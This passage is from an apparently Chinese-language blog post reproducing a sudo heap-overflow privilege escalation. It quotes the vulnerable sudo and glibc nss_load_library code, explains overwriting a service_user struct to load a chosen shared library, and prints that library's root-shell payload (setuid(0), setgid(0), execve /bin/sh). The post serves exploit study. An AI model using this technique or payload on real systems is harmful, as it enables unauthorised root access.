\/\/\u83b7\u53d6\u6240\u6709\u547d\u4ee4\u884c\u53c2\u6570\u7684\u957f\u5ea6\n for (size = 0, av = NewArgv + 1; *av; av++)\n size += strlen(*av) + 1;\n if (size == 0 || (user_args = malloc(size)) == NULL) {\n sudo_warnx(U_(\"%s: %s\"), __func__, U_(\"unable to allocate memory\"));\n debug_return_int(-1);\n }\n \/\/\u5c06\u547d\u4ee4\u884c\u53c2\u6570\u590d\u5236\u5230user_args \u3002\n for (to = user_args, av = NewArgv + 1; (from = *av); av++) {\n while (*from) {\n \/\/\u6f0f\u6d1e\u70b9\uff0c\u5f53\u4ee5\u53cd\u659c\u6760\u7ed3\u5c3e\u65f6\u9020\u6210heap overflow\n if (from[0] == '\\\\' && !isspace((unsigned char)from[1]))\n from++;\n *to++ = *from++;\n }\n *to++ = ' ';\n }\n *--to = '\\0';\n <\/code><\/pre>\n<\/div><\/div>\n\n\n\n\u4ee5\u8be5\u53c2\u6570\u4e3a\u4f8b\uff1a<\/p>\n\n\n\n
set args -s ‘\\’ “AAAAAAAAAAAAAAAAAAA”<\/p>\n\n\n\n
\u5f53form[0] == ‘\\\\’\u65f6\uff0cfrom++ \u5f53\u524d\u5b57\u7b26\u4e32\u7684\u7ed3\u675f\u7b26 \uff0c*to++ = *from++ \uff0cform\u6307\u5411\u4e0b\u4e2a\u5b57\u7b26\u4e32\u7684\u8d77\u59cb\u4f4d\u7f6e\uff08\u6b64\u65f6\u4e3aA\uff09\uff0cwhile \u5faa\u73af\u5185\uff0c\u5c06\u7b2c\u4e8c\u4e2a\u5b57\u7b26\u4e32\u53c8\u5199\u5165to\u4e2d\uff0c\u5b9e\u9645\u5199\u5165\u957f\u5ea6\u4f1a\u8d85\u8fc7\u5806\u5757\u5927\u5c0f\u3002<\/p>\n\n\n\n
\u53ef\u5229\u7528\u70b9\uff1a<\/p>\n\n\n\n
- \u5206\u914d\u7684\u5806\u5757\u5927\u5c0f\u53ef\u63a7\uff0c\u7531\u6240\u6709\u547d\u4ee4\u884c\u53c2\u6570\u7684\u957f\u5ea6\u6765\u51b3\u5b9a\u3002<\/li>
- \u53ef\u63a7\u5236\u5806\u6ea2\u51fa\u7684\u6570\u636e\uff0c \u6ea2\u51fa\u4e3a’\\\\’\u7684\u4e0b\u4e00\u4e2a\u5b57\u7b26\u4e32\u51b3\u5b9a\uff0c\u53ef\u5229\u7528\u73af\u5883\u53d8\u91cf\u3002<\/li>
- \u53ef\u5199\u5165null\u6570\u636e\uff0cfrom == ‘\\\\’ \u65f6\uff0c*to = * from++ \u5c06null\u5b57\u7b26\u5199\u5165\u3002<\/li><\/ol>\n\n\n\n
<\/p>\n\n\n\n
Exploitation\uff1a<\/p>\n\n\n\n
\u4f5c\u8005\u8bf4\u6709\u4e09\u79cd\u5229\u7528\u624b\u6bb5\uff0c\u6211\u9009\u62e9\u4e86\u53ef\u80fd\u6700\u597d\u590d\u73b0\u7684\u624b\u6bb5\u3002<\/p>\n\n\n\n
\u5c06\u5806\u5757\u6ea2\u51fa\u5230service_user \u5b57\u6bb5\u7684name<\/p>\n\n\n\n
typedef struct service_user\n{\n \/* And the link to the next entry. *\/\n struct service_user *next;\n \/* Action according to result. *\/\n lookup_actions actions[5];\n \/* Link to the underlying library object. *\/\n service_library *library;\n \/* Collection of known functions. *\/\n void *known;\n \/* Name of the service (`files', `dns', `nis', ...). *\/\n char name[0];\n} service_user;\n<\/code><\/pre>\n\n\n\nnss_load_library \u4f1a\u4f7f\u7528\u8be5\u7ed3\u6784\u4f53\u6765\u8f7d\u5165\u4e00\u4e2a\u65b0\u7684\u52a8\u6001\u94fe\u63a5\u5e93\u3002\u636e\u8bf4nss_load_librray\u5728\u6709\u5806\u6ea2\u51fa\u7684\u60c5\u51b5\u4e0b\uff0c\u5e38\u7528\u4e8e\u63d0\u6743\u3002\u4e4b\u540e\u53ef\u4ee5\u7ee7\u7eed\u6df1\u5165\u7814\u7a76\u8be5\u51fd\u6570\u7684\u8c03\u7528\u8fc7\u7a0b\u548c\u7528\u5904\uff0c<\/p>\n\n\n\n
static int\nnss_load_library (service_user *ni)\n{\n if (ni->library == NULL)\n {\n static name_database default_table;\n ni->library = nss_new_service (service_table ?: &default_table,\n\t\t\t\t ni->name);\n if (ni->library == NULL)\n\treturn -1;\n }\n\n if (ni->library->lib_handle == NULL)\n {\n \/* Load the shared library. *\/\n size_t shlen = (7 + strlen (ni->name) + 3\n\t\t + strlen (__nss_shlib_revision) + 1);\n int saved_errno = errno;\n char shlib_name[shlen];\n\n \/\/\u6784\u5efa\u52a8\u6001\u5e93\u7684\u540d\u79f0 libnss_*.so\n __stpcpy (__stpcpy (__stpcpy (__stpcpy (shlib_name,\n\t\t\t\t\t \"libnss_\"),\n\t\t\t\t ni->name),\n\t\t\t \".so\"),\n\t\t__nss_shlib_revision);\n\n ni->library->lib_handle = __libc_dlopen (shlib_name);\n if (ni->library->lib_handle == NULL)\n\t{\n\t \/* Failed to load the library. Try a fallback. *\/\n\t int n = __snprintf(shlib_name, shlen, \"libnss_%s.so.%d.%d\",\n\t\t\t ni->library->name, __GLIBC__, __GLIBC_MINOR__);\n\t if (n >= shlen)\n\t ni->library->lib_handle = NULL;\n\t else\n\t ni->library->lib_handle = __libc_dlopen (shlib_name);\n\n\t if (ni->library->lib_handle == NULL)\n\t {\n\t \/* Ok, really fail now. *\/\n\t ni->library->lib_handle = (void *) -1l;\n\t __set_errno (saved_errno);\n\t }\n\t}<\/code><\/pre>\n\n\n\n\u8fd9\u4e2a\u51fd\u6570\u6211\u4eec\u9700\u8981\u53bb\u547d\u4e2d<\/p>\n\n\n\n
ni->library->lib_handle = __libc_dlopen (shlib_name);<\/code><\/pre>\n\n\n\n\u89c2\u5bdf\u5224\u65ad\u6211\u4eec\u7684\u76ee\u6807\u5728if (ni->library->lib_handle == NULL)\u5185\u90e8\uff0c\u4f46\u662f\u7531\u4e8e ASLR \u7684\u5b58\u5728\uff0c\u5e76\u4e14\u6ca1\u6709\u5806\u5730\u5740\u7684\u6cc4\u9732\uff0c\u6240\u4ee5\u6211\u4eec\u6ca1\u6709\u529e\u6cd5\u786e\u4fddni->library->lib_handle \u4e00\u5b9a\u4e3a\u7a7a\uff0c\u4f46\u662f\u5728if (ni->library == NULL)\u7684\u521d\u59cb\u5316\u60c5\u51b5\uff0c\u4f1a\u65b0\u5efa\u4e00\u4e2aservice_user \uff0c\u6b64\u65f6\u7684ni->library->lib_handle \u4e3a\u7a7a\u3002<\/p>\n\n\n\n
\u8fd8\u6709\u4e00\u4e2a\u95ee\u9898\u5c31\u662f\u5728\u8f7d\u5165\u8fc7\u7a0b\u4e2d\u4f1a\u904d\u5386service_user \u7684next\u6307\u9488\uff0c\u6240\u4ee5\u4e0d\u80fd\u968f\u610f\u5c06\u8be5\u5b57\u6bb5\u5199\u5783\u573e\u6307\u9488\uff0c\u5e94\u5c06\u5176\u7f6e\u4e3aNULL\u3002\u7531\u4e8eheap\u6ea2\u51fa\u53ef\u80fd\u4f1a\u8986\u76d6\u76ee\u6807service_user\u7ed3\u6784\u4f53\u4e4b\u524d\u7684service_user \u5bfc\u81f4\u904d\u5386\u65f6\u51fa\u9519\u3002\u6240\u4ee5\u5c3d\u91cf\u8986\u76d6\u5230\u7b2c\u4e00\u4e2aservice_user \u6765\u786e\u4fdd\u6210\u529f\u5229\u7528\u3002<\/p>\n\n\n\n
\u6240\u4ee5\u5806\u6ea2\u51fa\u8986\u76d6service_user\u7684\u6570\u636e\u4e3a<\/p>\n\n\n\n
ni->library == NULL\nni->name = \u5f85\u52a0\u8f7dso\u7684\u540d\u79f0\nni->next = NULL<\/code><\/pre>\n\n\n\n\u63a7\u5236\u5806\u5206\u914d:<\/p>\n\n\n\n
\u5728\u6587\u7ae0\u4ed6\u4eec\u7528\u540d\u79f0\u4e3asystemd\u7684service_user \uff0c\u4ece\u590d\u73b0\u7684\u89d2\u5ea6\u6765\u770b\u6211\u4eec\u4e5f\u9009\u62e9\u8be5\u540d\u79f0\u7684service_user \uff0c\u5f53\u7136\u4e5f\u5e94\u8be5\u660e\u767d\u4e3a\u4ec0\u4e48\uff0c\u5c06\u8fd9\u4e00\u6b65\u7559\u5230\u4e4b\u540e\u7684\u5206\u6790\u4e2d\u3002<\/p>\n\n\n\n![\"\"](\"http:\/\/pareto.fun\/wp-content\/uploads\/2021\/05\/image-1.png\")
<\/figure>\n\n\n\n\u5728\u6587\u7ae0\u4e2d\u4f5c\u8005\uff0c\u5728\u5185\u5b58\u7a7a\u95f4\u641c\u7d22\u4e86\u201csystemd \u201d \u548c “mymachine”\u6765\u5b9a\u4f4d\u5f85\u6ea2\u51fa\u7684\u76ee\u6807\uff0c\u4f46\u662f\u6211\u4eec\u901a\u8fc7\u641c\u7d22\u5b57\u7b26\u4e32\u6211\u4eec\u53d1\u73b0\u53ea\u80fd\u627e\u5230systemd\u7684\u5806\u5757\u3002<\/p>\n\n\n\n
\u6211\u4eec\u77e5\u9053service_user \u662f\u4e2a\u5355\u94fe\u8868\uff0c\u8fd9\u91cc\u901a\u8fc7next\u6307\u9488\u5c06\u8fd9\u6761service_user \u94fe\u8868\u8fd8\u539f\u3002<\/p>\n\n\n\n![\"\"](\"http:\/\/pareto.fun\/wp-content\/uploads\/2021\/05\/image-2.png\")
<\/figure>\n\n\n\n0x563f627d6c58\u8be5\u5730\u5740\u5e76\u975e\u4e00\u4e2a\u5806\u5757\u5730\u5740\uff0c\u6240\u4ee5\u731c\u6d4b\u662f\u4e00\u4e2a\u5b58\u653eservice_user *\u7684\u5806\u7a7a\u95f4\u90a3\u4e48\u8fd9\u4e2a\u94fe\u6709\u4e24\u4e2a\u7ed3\u6784\u3002<\/p>\n\n\n\n
\u800cname == “systemd “\u7684\u7b2c\u4e8c\u4e2aservice_user\u94fe\u8868\uff0c\u94fe\u4e0a\u4ec5\u6709\u4e00\u4e2a\u7ed3\u6784\u4f53\u3002<\/p>\n\n\n\n
\u4f46\u662f\u8c03\u8bd5exp\u65f6\u53d1\u73b0\uff0c\u5b9e\u9645\u4f7f\u7528\u7684\u6ea2\u51fa\u7684\u76ee\u6807\u5806\u5757\u5730\u5740\u5747\u4e0d\u5728\u8fd9\u4e24\u6761\u94fe\u4e0a\uff0c\u53ef\u80fd\u5728\u540e\u671f\u7814\u7a76nss_load_library \u65f6\uff0c\u4f1a\u5f97\u5230\u89e3\u7b54\u3002\u4e5f\u53ef\u4ee5\u901a\u8fc7next\u6307\u9488\u56de\u6eaf\u5f53\u65f6\u5806\u5757\u6240\u5728\u7684service_user \u94fe\u3002<\/p>\n\n\n\n![\"\"](\"http:\/\/pareto.fun\/wp-content\/uploads\/2021\/05\/image-5.png\")
<\/figure>\n\n\n\n\u7531\u4e8ename=”x\/x”<\/p>\n\n\n\n
\u6309\u7167\u62fc\u63a5\u89c4\u5219<\/p>\n\n\n\n![\"\"](\"http:\/\/pareto.fun\/wp-content\/uploads\/2021\/05\/image-6.png\")
<\/figure>\n\n\n\n\u5b9e\u9645\u4f1a\u52a0\u8f7dlibnss_x\/s.so.2 \u7684\u52a8\u6001\u94fe\u63a5\u5e93\uff0c \u52a8\u6001\u94fe\u63a5\u5e93\u4ee3\u7801\uff1a<\/p>\n\n\n\n
static void __attribute__((constructor)) _init(void) {\n __asm __volatile__(\n \"addq $64, %rsp;\"\n \/\/ setuid(0);\n \"movq $105, %rax;\"\n \"movq $0, %rdi;\"\n \"syscall;\"\n\n\n \/\/ setgid(0);\n \"movq $106, %rax;\"\n \"movq $0, %rdi;\"\n \"syscall;\"\n\n\n \/\/ execve(\"\/bin\/sh\");\n \"movq $59, %rax;\"\n \"movq $0x0068732f6e69622f, %rdi;\"\n \"pushq %rdi;\"\n \"movq %rsp, %rdi;\"\n \"movq $0, %rdx;\"\n \"pushq %rdx;\"\n \"pushq %rdi;\"\n \"movq %rsp, %rsi;\"\n \"syscall;\"\n\n\n \/\/ exit(0);\n \"movq $60, %rax;\"\n \"movq $0, %rdi;\"\n \"syscall;\"\n\n);\n}<\/code><\/pre>\n\n\n\nconclusion\uff1a
\u672c\u6b21\u590d\u73b0\u8fd8\u6b8b\u7559\u4e86\u4e0d\u5c11\u95ee\u9898<\/p>\n\n\n\n
- \u5806\u5206\u914d\u7684\u7ec6\u8282<\/li>
- \u5982\u4f55\u53bb\u5b9a\u4f4d\u6ea2\u51fa\u7684service_user \u7ed3\u6784\uff1f<\/li>
- nss_load_library \u7684\u8c03\u7528\u8fc7\u7a0b\u548c\u5b83\u7684\u4f5c\u7528\u3002<\/li>
- \u4f5c\u8005\u5982\u4f55\u53d1\u73b0\u8be5\u6f0f\u6d1e\uff1f fuzz \uff1f \u5ba1\u8ba1\uff1f\u540e\u671f\u5c1d\u8bd5\u4f7f\u7528AFLfuzz\u6d4b\u8bd5\u4e0b\u3002<\/li><\/ol>\n\n\n\n
\u672c\u6b21\u590d\u73b0\u7b97\u662f\u8e0f\u4e0a\u4e86\u4ecectf\u5230\u771f\u5b9e\u73af\u5883\u6f0f\u6d1e\u7684\u7b2c\u4e00\u6b65\uff0c \u5e0c\u671b\u9532\u800c\u4e0d\u820d\u3002<\/p>\n\n\n\n
https:\/\/www.kalmarunionen.dk\/writeups\/sudo\/<\/a><\/p>\n\n\n\n